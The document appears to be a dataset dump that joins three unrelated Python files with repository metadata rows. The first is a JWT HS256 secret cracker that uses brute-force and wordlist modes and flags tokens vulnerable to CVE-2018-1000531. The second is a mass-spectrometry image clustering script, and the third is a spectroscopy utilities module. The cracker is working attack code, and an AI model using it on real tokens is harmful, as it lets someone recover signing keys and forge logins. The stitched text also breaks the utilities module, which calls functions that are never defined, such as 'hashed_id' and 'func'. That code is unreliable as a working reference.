def run(token, candidate):
"""This function checks if a candidate can decrypt a JWT token.
Arguments:
token {string} -- An encrypted JWT token to test
candidate {string} -- A candidate word for decoding
Returns:
[boolean] -- Result of the decoding attempt
"""
try:
payload = jwt.decode(token, candidate, algorithm='HS256')
return True
except jwt.exceptions.DecodeError:
logger.debug(f"DecodingError: {candidate}")
return False
except jwt.exceptions.InvalidTokenError:
logger.debug(f"InvalidTokenError: {candidate}")
return False
except Exception as ex:
logger.exception(f"Exception: {ex}")
sys.exit(1)
def is_vulnerable(args):
"""This function checks a JWT token against a well-known vulnerabilities.
Arguments:
args {object} -- The command-line arguments
"""
headers = jwt.get_unverified_header(args.token)
if headers['alg'] == "HS256":
logging.info("JWT vulnerable to HS256 guessing attacks")
elif headers['alg'] == "None":
logging.info("JWT vulnerable to CVE-2018-1000531")
def hs256_attack(args):
"""This function passes down different candidates to the run() function and is required
to handle different types of guessing attack.
Arguments:
args {object} -- The command-line arguments
"""
headers = jwt.get_unverified_header(args.token)
if not headers['alg'] == "HS256":
logging.error("JWT signed using an algorithm other than HS256.")
else:
tqdm_disable = True if args.log_level == "DEBUG" else False
if args.attack_mode == "brute-force":
# Count = ....
for candidate in tqdm(bruteforce(args.charset, args.increment_min, args.increment_max), disable=tqdm_disable):
if run(args.token, candidate):
return candidate
return None
elif args.attack_mode == "wordlist":
word_count = len(open(args.wordlist.name, "r",
encoding="utf-8").readlines())
for entry in tqdm(args.wordlist, disable=tqdm_disable, total=word_count):
if run(args.token, entry.rstrip()):
return entry.rstrip()
return None
def main():
try:
args = parse_args()
logger.setLevel(args.log_level)
start_time = time.time()
if args.attack_mode == "vulnerable":
is_vulnerable(args)
elif args.attack_mode in ('brute-force', 'wordlist'):
logger.warning(
"For attacking complex JWT, it is best to use compiled, GPU accelerated password crackers such as Hashcat and John the Ripper which offer more advanced techniques such as raw brute forcing, rules-based, and mask attacks.")
logger.info(
"Pour yourself a cup (or two) of ☕ as this operation might take a while depending on the size of your wordlist.")
candidate = hs256_attack(args)
if candidate:
logger.info(f"Private key found: {candidate}")
if args.outfile:
args.outfile.write(f"{args.token}:{candidate}\n")
logging.info(f"Private key saved to: {args.outfile.name}")
# Save the private secret into a file in case sys.stdout is unresponsive
if not args.potfile_disable:
args.potfile.write(f"{args.token}:{candidate}\n")
else:
logger.info(
"The private key was not found in this wordlist. Consider using a bigger wordlist or other types of attacks.")
end_time = time.time()
elapsed_time = end_time - start_time
logger.info(f"Finished in {elapsed_time} sec")
except KeyboardInterrupt:
logger.error("CTRL+C pressed, exiting...")
# Not sure if necessary
# args.wordlist.close()
elapsed_time = time.time() - start_time
logger.info(f"Interrupted after {elapsed_time} sec")
except Exception as e:
logger.error(f"{e}")
if __name__ == "__main__":
main()
| 1,811 | 0 | 23 |
b330967e3f8aafec1bee4bafd68911efd75bd2be | 4,523 | py | Python | MSI-segmentation/MSI-segmentation_L1.0.py | hanghu1024/MSI-segmentation | fe5082575fb2c06a2baffaf89f6da7627fa165ac | [
"MIT"
] | 4 | 2021-06-22T15:27:02.000Z | 2022-03-05T17:07:31.000Z | MSI-segmentation/MSI-segmentation_L1.0.py | hanghu1024/MSI-segmentation | fe5082575fb2c06a2baffaf89f6da7627fa165ac | [
"MIT"
] | null | null | null | MSI-segmentation/MSI-segmentation_L1.0.py | hanghu1024/MSI-segmentation | fe5082575fb2c06a2baffaf89f6da7627fa165ac | [
"MIT"
] | 1 | 2021-12-07T12:51:45.000Z | 2021-12-07T12:51:45.000Z | #===========================================
# import modules, defs and variables
#===========================================
exec(open("./external.py").read())
exec(open("./defs.py").read())
exec(open("./config.py").read())
print('Finish modules, defs and variables import')
#===========================================
# L1.0 import data
#===========================================
df_pixel_rep = pd.read_csv(L0outputDir)
pixel_rep = df_pixel_rep.values.astype(np.float64)
print('Finish pixel raw data import')
#===========================================
# L1.0 data processing and manipulate
#===========================================
nPCs = retrace_columns(df_pixel_rep.columns.values, 'PC')
pcs = pixel_rep[:, 2:nPCs + 2]
# make folders for multivariate analysis
OutputFolder = locate_OutputFolder2(L0outputDir)
OutputFolder = locate_OutputFolder3(OutputFolder, 'multivariate clustering')
os.mkdir(OutputFolder)
# initiate a df for labels
df_pixel_label = pd.DataFrame(data=df_pixel_rep[['line_index', 'spectrum_index']].values.astype(int), columns = ['line_index','spectrum_index'])
print('Finish raw data processing')
#===========================================
# L1.0 GMM ensemble clustering
#===========================================
n_component = generate_nComponentList(n_components, span)
for i in range(repeat): # may repeat several times
for j in range(n_component.shape[0]): # ensemble with different n_component value
StaTime = time.time()
gmm = GMM(n_components = n_component[j], max_iter = 500) # max_iter does matter, no random seed assigned
labels = gmm.fit_predict(pcs)
# save data
index = j+1+i*n_component.shape[0]
title = 'No.' + str(index) + '_' +str(n_component[j]) + '_' + str(i)
df_pixel_label[title] = labels
SpenTime = (time.time() - StaTime)
# progressbar
print('{}/{}, finish classifying {}, running time is: {} s'.format(index, repeat*span, title, round(SpenTime, 2)))
print('Finish L1.0 GMM ensemble clustering, next step: L1.1 data process, plot and export data')
#===========================================
# L1.1 data processing and manipulate
#===========================================
pixel_label = relabel(df_pixel_label)
# parse dimension
NumLine = np.max(df_pixel_label.iloc[:,0])+1
NumSpePerLine = np.max(df_pixel_label.iloc[:,1])+1
# parameter for plotting
aspect = AspectRatio*NumSpePerLine/NumLine
# organize img
img = pixel_label.T.reshape(pixel_label.shape[1], NumLine, NumSpePerLine)
print('Finish L1.1 data process')
#===========================================
# L1.1 ensemble results in mosaic plot, save images
#===========================================
# mosaic img show
# parameters:
w_fig = 20 # default setting
ncols = ncols_L1
nrows = math.ceil((img.shape[0]-2)/ncols)
h_fig = w_fig * nrows * (AspectRatio + 0.16) / ncols # 0.2 is the space for title parameters
columns = df_pixel_label.columns.values
fig = plt.figure(figsize=(w_fig, h_fig))
fig.subplots_adjust(hspace= 0, wspace=0.01, right=0.95)
for i in range(1, img.shape[0]+1):
ax = fig.add_subplot(nrows, ncols, i)
im = ax.imshow(img[i-1], cmap=cm.tab20, aspect = aspect, vmin=0,vmax=19, interpolation='none')
ax.set_xticks([])
ax.set_yticks([])
# title
title = columns[i+1]
ax.set_title(title, pad=8, fontsize = 15)
# colorbar
cbar_ax = fig.add_axes([0.96,0.1,0.01,0.8])
cbar = fig.colorbar(im, cax=cbar_ax, ticks=[0.5,1.4,2.3,3.3,4.3,5.1,6.2,7,8.1,9,10,10.9,11.8,12.7,13.6,14.7,15.6,16.6,17.5,18.5])
cbar.ax.set_yticklabels([0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19]) #hard code
cbar.ax.tick_params(labelsize=10)
SaveDir = OutputFolder + '\\ensemble_clustering_plot.png'
plt.savefig(SaveDir, dpi=dpi)
plt.close()
print('Finish L1.1 GMM ensemble clustering result plotting, saving .csv file')
#===========================================
# save data
#===========================================
# organize a dataframe for relabel data
df_pixel_relabel = pd.DataFrame(pixel_label.astype(int), columns = df_pixel_label.columns.values[2:df_pixel_label.shape[1]])
df_pixel_relabel.insert(0, 'spectrum_index', df_pixel_label.iloc[:,1])
df_pixel_relabel.insert(0, 'line_index', df_pixel_label.iloc[:,0])
SaveDir = OutputFolder + '\\pixel_label.csv'
df_pixel_relabel.to_csv(SaveDir, index=False, sep=',')
print('L1 is done, please check output results at: \n{}'.format(OutputFolder))
| 37.380165 | 144 | 0.605129 | #===========================================
# import modules, defs and variables
#===========================================
exec(open("./external.py").read())
exec(open("./defs.py").read())
exec(open("./config.py").read())
print('Finish modules, defs and variables import')
#===========================================
# L1.0 import data
#===========================================
df_pixel_rep = pd.read_csv(L0outputDir)
pixel_rep = df_pixel_rep.values.astype(np.float64)
print('Finish pixel raw data import')
#===========================================
# L1.0 data processing and manipulate
#===========================================
nPCs = retrace_columns(df_pixel_rep.columns.values, 'PC')
pcs = pixel_rep[:, 2:nPCs + 2]
# make folders for multivariate analysis
OutputFolder = locate_OutputFolder2(L0outputDir)
OutputFolder = locate_OutputFolder3(OutputFolder, 'multivariate clustering')
os.mkdir(OutputFolder)
# initiate a df for labels
df_pixel_label = pd.DataFrame(data=df_pixel_rep[['line_index', 'spectrum_index']].values.astype(int), columns = ['line_index','spectrum_index'])
print('Finish raw data processing')
#===========================================
# L1.0 GMM ensemble clustering
#===========================================
n_component = generate_nComponentList(n_components, span)
for i in range(repeat): # may repeat several times
for j in range(n_component.shape[0]): # ensemble with different n_component value
StaTime = time.time()
gmm = GMM(n_components = n_component[j], max_iter = 500) # max_iter does matter, no random seed assigned
labels = gmm.fit_predict(pcs)
# save data
index = j+1+i*n_component.shape[0]
title = 'No.' + str(index) + '_' +str(n_component[j]) + '_' + str(i)
df_pixel_label[title] = labels
SpenTime = (time.time() - StaTime)
# progressbar
print('{}/{}, finish classifying {}, running time is: {} s'.format(index, repeat*span, title, round(SpenTime, 2)))
print('Finish L1.0 GMM ensemble clustering, next step: L1.1 data process, plot and export data')
#===========================================
# L1.1 data processing and manipulate
#===========================================
pixel_label = relabel(df_pixel_label)
# parse dimension
NumLine = np.max(df_pixel_label.iloc[:,0])+1
NumSpePerLine = np.max(df_pixel_label.iloc[:,1])+1
# parameter for plotting
aspect = AspectRatio*NumSpePerLine/NumLine
# organize img
img = pixel_label.T.reshape(pixel_label.shape[1], NumLine, NumSpePerLine)
print('Finish L1.1 data process')
#===========================================
# L1.1 ensemble results in mosaic plot, save images
#===========================================
# mosaic img show
# parameters:
w_fig = 20 # default setting
ncols = ncols_L1
nrows = math.ceil((img.shape[0]-2)/ncols)
h_fig = w_fig * nrows * (AspectRatio + 0.16) / ncols # 0.2 is the space for title parameters
columns = df_pixel_label.columns.values
fig = plt.figure(figsize=(w_fig, h_fig))
fig.subplots_adjust(hspace= 0, wspace=0.01, right=0.95)
for i in range(1, img.shape[0]+1):
ax = fig.add_subplot(nrows, ncols, i)
im = ax.imshow(img[i-1], cmap=cm.tab20, aspect = aspect, vmin=0,vmax=19, interpolation='none')
ax.set_xticks([])
ax.set_yticks([])
# title
title = columns[i+1]
ax.set_title(title, pad=8, fontsize = 15)
# colorbar
cbar_ax = fig.add_axes([0.96,0.1,0.01,0.8])
cbar = fig.colorbar(im, cax=cbar_ax, ticks=[0.5,1.4,2.3,3.3,4.3,5.1,6.2,7,8.1,9,10,10.9,11.8,12.7,13.6,14.7,15.6,16.6,17.5,18.5])
cbar.ax.set_yticklabels([0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19]) #hard code
cbar.ax.tick_params(labelsize=10)
SaveDir = OutputFolder + '\\ensemble_clustering_plot.png'
plt.savefig(SaveDir, dpi=dpi)
plt.close()
print('Finish L1.1 GMM ensemble clustering result plotting, saving .csv file')
#===========================================
# save data
#===========================================
# organize a dataframe for relabel data
df_pixel_relabel = pd.DataFrame(pixel_label.astype(int), columns = df_pixel_label.columns.values[2:df_pixel_label.shape[1]])
df_pixel_relabel.insert(0, 'spectrum_index', df_pixel_label.iloc[:,1])
df_pixel_relabel.insert(0, 'line_index', df_pixel_label.iloc[:,0])
SaveDir = OutputFolder + '\\pixel_label.csv'
df_pixel_relabel.to_csv(SaveDir, index=False, sep=',')
print('L1 is done, please check output results at: \n{}'.format(OutputFolder))
| 0 | 0 | 0 |
0717646489a2d80fa3f23fe03a050b78b42cbf8a | 40,498 | py | Python | smhr_session/utils.py | alexji/smhr-session | 98cf3dd5da737752e704cffb005f729dfc2711dd | [
"MIT"
] | null | null | null | smhr_session/utils.py | alexji/smhr-session | 98cf3dd5da737752e704cffb005f729dfc2711dd | [
"MIT"
] | null | null | null | smhr_session/utils.py | alexji/smhr-session | 98cf3dd5da737752e704cffb005f729dfc2711dd | [
"MIT"
] | null | null | null | # coding: utf-8
""" Utility functions for Spectroscopy Made Hard """
__author__ = "Andy Casey <andy@astrowizici.st>"
# Standard library
import os
import logging
import platform
import string
import sys
import traceback
import tempfile
from six import string_types
from collections import Counter, OrderedDict
try:
from subprocess import getstatusoutput
except ImportError: # python 2
from commands import getstatusoutput
from hashlib import sha1 as sha
from random import choice
from socket import gethostname, gethostbyname
# Third party imports
import numpy as np
import astropy.table
from scipy import stats, integrate, optimize
common_molecule_name2Z = {
'Mg-H': 12,'H-Mg': 12,
'C-C': 6,
'C-N': 7, 'N-C': 7, #TODO
'C-H': 6, 'H-C': 6,
'O-H': 8, 'H-O': 8,
'Fe-H': 26,'H-Fe': 26,
'N-H': 7, 'H-N': 7,
'Si-H': 14,'H-Si': 14,
'Ti-O': 22,'O-Ti': 22,
'V-O': 23,'O-V': 23,
'Zr-O': 40,'O-Zr': 40
}
common_molecule_name2species = {
'Mg-H': 112,'H-Mg': 112,
'C-C': 606,
'C-N': 607,'N-C': 607,
'C-H': 106,'H-C': 106,
'O-H': 108,'H-O': 108,
'Fe-H': 126,'H-Fe': 126,
'N-H': 107,'H-N': 107,
'Si-H': 114,'H-Si': 114,
'Ti-O': 822,'O-Ti': 822,
'V-O': 823,'O-V': 823,
'Zr-O': 840,'O-Zr': 840
}
common_molecule_species2elems = {
112: ["Mg", "H"],
606: ["C", "C"],
607: ["C", "N"],
106: ["C", "H"],
108: ["O", "H"],
126: ["Fe", "H"],
107: ["N", "H"],
114: ["Si", "H"],
822: ["Ti", "O"],
823: ["V", "O"],
840: ["Zr", "O"]
}
__all__ = ["element_to_species", "element_to_atomic_number", "species_to_element", "get_common_letters", \
"elems_isotopes_ion_to_species", "species_to_elems_isotopes_ion", \
"find_common_start", "extend_limits", "get_version", \
"approximate_stellar_jacobian", "approximate_sun_hermes_jacobian",\
"hashed_id"]
logger = logging.getLogger(__name__)
def equilibrium_state(transitions, columns=("expot", "rew"), group_by="species",
ycolumn="abundance", yerr_column=None):
"""
Perform linear fits to the abundances provided in the transitions table
with respect to x-columns.
:param transitions:
A table of atomic transitions with measured equivalent widths and
abundances.
:param columns: [optional]
The names of the columns to make fits against.
:param group_by: [optional]
The name of the column in `transitions` to calculate states.
"""
lines = {}
transitions = transitions.group_by(group_by)
for i, start_index in enumerate(transitions.groups.indices[:-1]):
end_index = transitions.groups.indices[i + 1]
# Do excitation potential first.
group_lines = {}
for x_column in columns:
x = transitions[x_column][start_index:end_index]
y = transitions["abundance"][start_index:end_index]
if yerr_column is not None:
try:
yerr = transitions[yerr_column][start_index:end_index]
except KeyError:
logger.exception("Cannot find yerr column '{}':".format(
yerr_column))
yerr = np.ones(len(y))
else:
yerr = np.ones(len(y))
# Only use finite values.
finite = np.isfinite(x * y * yerr)
try: # fix for masked arrays
finite = finite.filled(False)
except:
pass
if not np.any(finite):
#group_lines[x_column] = (np.nan, np.nan, np.nan, np.nan, 0)
continue
m, b, medy, stdy, stdm, N = fit_line(x, y, None)
group_lines[x_column] = (m, b, medy, (stdy, stdm), N)
# x, y, yerr = np.array(x[finite]), np.array(y[finite]), np.array(yerr[finite])
#
# # Let's remove the covariance between m and b by making the mean of x = 0
# xbar = np.mean(x)
# x = x - xbar
# # y = mx+b = m(x-xbar) + (b+m*xbar), so m is unchanged but b is shifted.
#
## A = np.vstack((np.ones_like(x), x)).T
## C = np.diag(yerr**2)
## try:
## cov = np.linalg.inv(np.dot(A.T, np.linalg.solve(C, A)))
## b, m = np.dot(cov, np.dot(A.T, np.linalg.solve(C, y)))
##
## except np.linalg.LinAlgError:
## #group_lines[x_column] \
## # = (np.nan, np.nan, np.median(y), np.std(y), len(x))
## None
##
## else:
## #group_lines[x_column] = (m, b, np.median(y), (np.std(y), np.sqrt(cov[1,1])), len(x))
## group_lines[x_column] = (m, b+m*xbar, np.median(y), (np.std(y), np.sqrt(cov[1,1])), len(x))
# m, b, r, p, m_stderr = stats.linregress(x, y)
# group_lines[x_column] = (m, b-m*xbar, np.median(y), (np.std(y), m_stderr), len(x))
identifier = transitions[group_by][start_index]
if group_lines:
lines[identifier] = group_lines
return lines
def spectral_model_conflicts(spectral_models, line_list):
"""
Identify abundance conflicts in a list of spectral models.
:param spectral_models:
A list of spectral models to check for conflicts.
:param line_list:
A table of energy transitions.
:returns:
A list containing tuples of spectral model indices where there is a
conflict about which spectral model to use for the determination of
stellar parameters and/or composition.
"""
line_list_hashes = line_list.compute_hashes()
transition_hashes = {}
for i, spectral_model in enumerate(spectral_models):
for transition in spectral_model.transitions:
transition_hash = line_list.hash(transition)
transition_hashes.setdefault(transition_hash, [])
transition_hashes[transition_hash].append(i)
# Which of the transition_hashes appear more than once?
conflicts = []
for transition_hash, indices in transition_hashes.iteritems():
if len(indices) < 2: continue
# OK, what element is this transition?
match = (line_list_hashes == transition_hash)
element = line_list["element"][match][0].split()[0]
# Of the spectral models that use this spectral hash, what are they
# measuring?
conflict_indices = []
for index in indices:
if element not in spectral_models[index].metadata["elements"]:
# This transition is not being measured in this spectral model.
continue
else:
# This spectral model is modeling this transition.
# Does it say this should be used for the determination of
# stellar parameters or composition?
if spectral_models[index].use_for_stellar_parameter_inference \
or spectral_models[index].use_for_stellar_composition_inference:
conflict_indices.append(index)
if len(conflict_indices) > 1:
conflicts.append(conflict_indices)
return conflicts
# List the periodic table here so that we can use it outside of a single
# function scope (e.g., 'element in utils.periodic_table')
periodic_table = """H He
Li Be B C N O F Ne
Na Mg Al Si P S Cl Ar
K Ca Sc Ti V Cr Mn Fe Co Ni Cu Zn Ga Ge As Se Br Kr
Rb Sr Y Zr Nb Mo Tc Ru Rh Pd Ag Cd In Sn Sb Te I Xe
Cs Ba Lu Hf Ta W Re Os Ir Pt Au Hg Tl Pb Bi Po At Rn
Fr Ra Lr Rf"""
lanthanoids = "La Ce Pr Nd Pm Sm Eu Gd Tb Dy Ho Er Tm Yb"
actinoids = "Ac Th Pa U Np Pu Am Cm Bk Cf Es Fm Md No"
periodic_table = periodic_table.replace(" Ba ", " Ba " + lanthanoids + " ") \
.replace(" Ra ", " Ra " + actinoids + " ").split()
del actinoids, lanthanoids
hashed_id = hashed_id()
def approximate_stellar_jacobian(stellar_parameters, *args):
""" Approximate the Jacobian of the stellar parameters and
minimisation parameters, based on calculations from the Sun """
logger.info("Updated approximation of the Jacobian")
teff, vt, logg, feh = stellar_parameters[:4]
# This is the black magic.
full_jacobian = np.array([
[ 5.4393e-08*teff - 4.8623e-04, -7.2560e-02*vt + 1.2853e-01, 1.6258e-02*logg - 8.2654e-02, 1.0897e-02*feh - 2.3837e-02],
[ 4.2613e-08*teff - 4.2039e-04, -4.3985e-01*vt + 8.0592e-02, -5.7948e-02*logg - 1.2402e-01, -1.1533e-01*feh - 9.2341e-02],
[-3.2710e-08*teff + 2.8178e-04, 3.8185e-03*vt - 1.6601e-02, -1.2006e-02*logg - 3.5816e-03, -2.8592e-05*feh + 1.4257e-03],
[-1.7822e-08*teff + 1.8250e-04, 3.5564e-02*vt - 1.1024e-01, -1.2114e-02*logg + 4.1779e-02, -1.8847e-02*feh - 1.0949e-01]
])
return full_jacobian.T
def approximate_sun_hermes_jacobian(stellar_parameters, *args):
"""
Approximate the Jacobian of the stellar parameters and
minimisation parameters, based on calculations using the Sun
and the HERMES atomic line list, after equivalent widths
were carefully inspected.
"""
# logger.info("Updated approximation of the Jacobian")
teff, vt, logg, feh = stellar_parameters[:4]
# full_jacobian = np.array([
# [ 4.4973e-08*teff - 4.2747e-04, -1.2404e-03*vt + 2.4748e-02, 1.6481e-02*logg - 5.1979e-02, 1.0470e-02*feh - 8.5645e-03],
# [-9.3371e-08*teff + 6.9953e-04, 5.0115e-02*vt - 3.0106e-01, -6.0800e-02*logg + 6.7056e-02, -4.1281e-02*feh - 6.2085e-02],
# [-2.1326e-08*teff + 1.9121e-04, 1.0508e-03*vt + 1.1099e-03, -6.1479e-03*logg - 1.7401e-02, 3.4172e-03*feh + 3.7851e-03],
# [-9.4547e-09*teff + 1.1280e-04, 1.0033e-02*vt - 3.6439e-02, -9.5015e-03*logg + 3.2700e-02, -1.7947e-02*feh - 1.0383e-01]
# ])
# After culling abundance outliers,..
full_jacobian = np.array([
[ 4.5143e-08*teff - 4.3018e-04, -6.4264e-04*vt + 2.4581e-02, 1.7168e-02*logg - 5.3255e-02, 1.1205e-02*feh - 7.3342e-03],
[-1.0055e-07*teff + 7.5583e-04, 5.0811e-02*vt - 3.1919e-01, -6.7963e-02*logg + 7.3189e-02, -4.1335e-02*feh - 6.0225e-02],
[-1.9097e-08*teff + 1.8040e-04, -3.8736e-03*vt + 7.6987e-03, -6.4754e-03*logg - 2.0095e-02, -4.1837e-03*feh - 4.1084e-03],
[-7.3958e-09*teff + 1.0175e-04, 6.5783e-03*vt - 3.6509e-02, -9.7692e-03*logg + 3.2322e-02, -1.7391e-02*feh - 1.0502e-01]
])
return full_jacobian.T
def approximate_stellar_jacobian_2(stellar_parameters, *args):
""" Approximate the Jacobian of the stellar parameters and
minimisation parameters, based on calculations from the Sun """
logger.info("Updated approximation of the Jacobian {}".format(stellar_parameters))
teff, logg, vt, feh = stellar_parameters[:4]
#if np.isnan(teff): teff = 5000.; logger.info("jacobian: teff=nan->5000")
#if np.isnan(logg): logg = 2.0; logger.info("jacobian: logg=nan->2.0")
#if np.isnan(vt): vt = 1.75; logger.info("jacobian: vt=nan->1.75")
#if np.isnan(feh): feh = -2.0; logger.info("jacobian: feh=nan->-2.0")
# This is the black magic.
full_jacobian = np.array([
[ 5.4393e-08*teff - 4.8623e-04, 1.6258e-02*logg - 8.2654e-02, -7.2560e-02*vt + 1.2853e-01, 1.0897e-02*feh - 2.3837e-02],
[ 4.2613e-08*teff - 4.2039e-04, -5.7948e-02*logg - 1.2402e-01, -4.3985e-01*vt + 8.0592e-02, -1.1533e-01*feh - 9.2341e-02],
[-3.2710e-08*teff + 2.8178e-04, -1.2006e-02*logg - 3.5816e-03, 3.8185e-03*vt - 1.6601e-02, -2.8592e-05*feh + 1.4257e-03],
[-1.7822e-08*teff + 1.8250e-04, -1.2114e-02*logg + 4.1779e-02, 3.5564e-02*vt - 1.1024e-01, -1.8847e-02*feh - 1.0949e-01]
])
return full_jacobian.T
def approximate_sun_hermes_jacobian_2(stellar_parameters, *args):
"""
Approximate the Jacobian of the stellar parameters and
minimisation parameters, based on calculations using the Sun
and the HERMES atomic line list, after equivalent widths
were carefully inspected.
"""
# logger.info("Updated approximation of the Jacobian")
teff, logg, vt, feh = stellar_parameters[:4]
# full_jacobian = np.array([
# [ 4.4973e-08*teff - 4.2747e-04, -1.2404e-03*vt + 2.4748e-02, 1.6481e-02*logg - 5.1979e-02, 1.0470e-02*feh - 8.5645e-03],
# [-9.3371e-08*teff + 6.9953e-04, 5.0115e-02*vt - 3.0106e-01, -6.0800e-02*logg + 6.7056e-02, -4.1281e-02*feh - 6.2085e-02],
# [-2.1326e-08*teff + 1.9121e-04, 1.0508e-03*vt + 1.1099e-03, -6.1479e-03*logg - 1.7401e-02, 3.4172e-03*feh + 3.7851e-03],
# [-9.4547e-09*teff + 1.1280e-04, 1.0033e-02*vt - 3.6439e-02, -9.5015e-03*logg + 3.2700e-02, -1.7947e-02*feh - 1.0383e-01]
# ])
# After culling abundance outliers,..
full_jacobian = np.array([
[ 4.5143e-08*teff - 4.3018e-04, 1.7168e-02*logg - 5.3255e-02, -6.4264e-04*vt + 2.4581e-02, 1.1205e-02*feh - 7.3342e-03],
[-1.0055e-07*teff + 7.5583e-04, -6.7963e-02*logg + 7.3189e-02, 5.0811e-02*vt - 3.1919e-01, -4.1335e-02*feh - 6.0225e-02],
[-1.9097e-08*teff + 1.8040e-04, -6.4754e-03*logg - 2.0095e-02, -3.8736e-03*vt + 7.6987e-03, -4.1837e-03*feh - 4.1084e-03],
[-7.3958e-09*teff + 1.0175e-04, -9.7692e-03*logg + 3.2322e-02, 6.5783e-03*vt - 3.6509e-02, -1.7391e-02*feh - 1.0502e-01]
])
return full_jacobian.T
def element_to_species(element_repr):
""" Converts a string representation of an element and its ionization state
to a floating point """
if not isinstance(element_repr, string_types):
raise TypeError("element must be represented by a string-type")
if element_repr.count(" ") > 0:
element, ionization = element_repr.split()[:2]
else:
element, ionization = element_repr, "I"
if element not in periodic_table:
try:
return common_molecule_name2species[element]
except KeyError:
# Don't know what this element is
return float(element_repr)
ionization = max([0, ionization.upper().count("I") - 1]) /10.
transition = periodic_table.index(element) + 1 + ionization
return transition
def element_to_atomic_number(element_repr):
"""
Converts a string representation of an element and its ionization state
to a floating point.
:param element_repr:
A string representation of the element. Typical examples might be 'Fe',
'Ti I', 'si'.
"""
if not isinstance(element_repr, string_types):
raise TypeError("element must be represented by a string-type")
element = element_repr.title().strip().split()[0]
try:
index = periodic_table.index(element)
except IndexError:
raise ValueError("unrecognized element '{}'".format(element_repr))
except ValueError:
try:
return common_molecule_name2Z[element]
except KeyError:
raise ValueError("unrecognized element '{}'".format(element_repr))
return 1 + index
def species_to_element(species):
""" Converts a floating point representation of a species to a string
representation of the element and its ionization state """
if not isinstance(species, (float, int)):
raise TypeError("species must be represented by a floating point-type")
if round(species,1) != species:
# Then you have isotopes, but we will ignore that
species = int(species*10)/10.
if species + 1 >= len(periodic_table) or 1 > species:
# Don"t know what this element is. It"s probably a molecule.
try:
elems = common_molecule_species2elems[species]
return "-".join(elems)
except KeyError:
# No idea
return str(species)
atomic_number = int(species)
element = periodic_table[int(species) - 1]
ionization = int(round(10 * (species - int(species)) + 1))
# The special cases
if element in ("C", "H", "He"): return element
return "%s %s" % (element, "I" * ionization)
def extend_limits(values, fraction=0.10, tolerance=1e-2):
""" Extend the values of a list by a fractional amount """
values = np.array(values)
finite_indices = np.isfinite(values)
if np.sum(finite_indices) == 0:
raise ValueError("no finite values provided")
lower_limit, upper_limit = np.min(values[finite_indices]), np.max(values[finite_indices])
ptp_value = np.ptp([lower_limit, upper_limit])
new_limits = lower_limit - fraction * ptp_value, ptp_value * fraction + upper_limit
if np.abs(new_limits[0] - new_limits[1]) < tolerance:
if np.abs(new_limits[0]) < tolerance:
# Arbitrary limits, since we"ve just been passed zeros
offset = 1
else:
offset = np.abs(new_limits[0]) * fraction
new_limits = new_limits[0] - offset, offset + new_limits[0]
return np.array(new_limits)
def get_version():
""" Retrieves the version of Spectroscopy Made Hard based on the
git version """
if getstatusoutput("which git")[0] == 0:
git_commands = ("git rev-parse --abbrev-ref HEAD", "git log --pretty=format:'%h' -n 1")
return "0.1dev:" + ":".join([getstatusoutput(command)[1] for command in git_commands])
else:
return "Unknown"
def struct2array(x):
""" Convert numpy structured array of simple type to normal numpy array """
Ncol = len(x.dtype)
type = x.dtype[0].type
assert np.all([x.dtype[i].type == type for i in range(Ncol)])
return x.view(type).reshape((-1,Ncol))
def process_session_uncertainties_lines(session, rhomat, minerr=0.001):
"""
Using Sergey's estimator
"""
from .spectral_models import ProfileFittingModel, SpectralSynthesisModel
from .photospheres.abundances import asplund_2009 as solar_composition
cols = ["index","wavelength","species","expot","loggf",
"logeps","e_stat","eqw","e_eqw","fwhm",
"e_Teff","e_logg","e_vt","e_MH","e_sys",
"e_tot","weight"]
data = OrderedDict(zip(cols, [[] for col in cols]))
for i, model in enumerate(session.spectral_models):
if not model.is_acceptable: continue
if model.is_upper_limit: continue
wavelength = model.wavelength
species = np.ravel(model.species)[0]
expot = model.expot
loggf = model.loggf
if np.isnan(expot) or np.isnan(loggf):
print(i, species, model.expot, model.loggf)
try:
logeps = model.abundances[0]
staterr = model.metadata["1_sigma_abundance_error"]
if isinstance(model, SpectralSynthesisModel):
(named_p_opt, cov, meta) = model.metadata["fitted_result"]
if np.isfinite(cov[0,0]**0.5):
staterr = max(staterr, cov[0,0]**0.5)
assert ~np.isnan(staterr)
# apply minimum
staterr = np.sqrt(staterr**2 + minerr**2)
sperrdict = model.metadata["systematic_stellar_parameter_abundance_error"]
e_Teff = sperrdict["effective_temperature"]
e_logg = sperrdict["surface_gravity"]
e_vt = sperrdict["microturbulence"]
e_MH = sperrdict["metallicity"]
e_all = np.array([e_Teff, e_logg, e_vt, e_MH])
syserr_sq = e_all.T.dot(rhomat.dot(e_all))
syserr = np.sqrt(syserr_sq)
fwhm = model.fwhm
except Exception as e:
print("ERROR!!!")
print(i, species, model.wavelength)
print("Exception:",e)
logeps, staterr, e_Teff, e_logg, e_vt, e_MH, syserr = np.nan, np.nan, np.nan, np.nan, np.nan, np.nan, np.nan
if isinstance(model, ProfileFittingModel):
eqw = model.equivalent_width or np.nan
e_eqw = model.equivalent_width_uncertainty or np.nan
else:
eqw = -999
e_eqw = -999
#toterr = np.sqrt(staterr**2 + syserr**2)
input_data = [i, wavelength, species, expot, loggf,
logeps, staterr, eqw, e_eqw, fwhm,
e_Teff, e_logg, e_vt, e_MH, syserr,
np.nan, np.nan]
for col, x in zip(cols, input_data):
data[col].append(x)
tab = astropy.table.Table(data)
# Calculate systematic error and effective weights for each species
tab["e_sys"] = np.nan
for species in np.unique(tab["species"]):
ix = np.where(tab["species"]==species)[0]
t = tab[ix]
# Estimate systematic error s
s = s_old = 0.
s_max = 2.
delta = struct2array(t["e_Teff","e_logg","e_vt","e_MH"].as_array())
ex = t["e_stat"]
for i in range(35):
sigma_tilde = np.diag(s**2 + ex**2) + (delta.dot(rhomat.dot(delta.T)))
sigma_tilde_inv = np.linalg.inv(sigma_tilde)
w = np.sum(sigma_tilde_inv, axis=1)
xhat = np.sum(w*t["logeps"])/np.sum(w)
dx = t["logeps"] - xhat
if func(0) < func(s_max):
s = 0
break
s = optimize.brentq(func, 0, s_max, xtol=.001)
if np.abs(s_old - s) < 0.01:
break
s_old = s
else:
print(species,"s did not converge!")
print("Final in {} iter: {:.1f} {:.3f}".format(i+1, species, s))
tab["e_sys"][ix] = s
tab["e_tot"][ix] = np.sqrt(s**2 + ex**2)
sigma_tilde = np.diag(tab["e_tot"][ix]**2) + (delta.dot(rhomat.dot(delta.T)))
sigma_tilde_inv = np.linalg.inv(sigma_tilde)
w = np.sum(sigma_tilde_inv, axis=1)
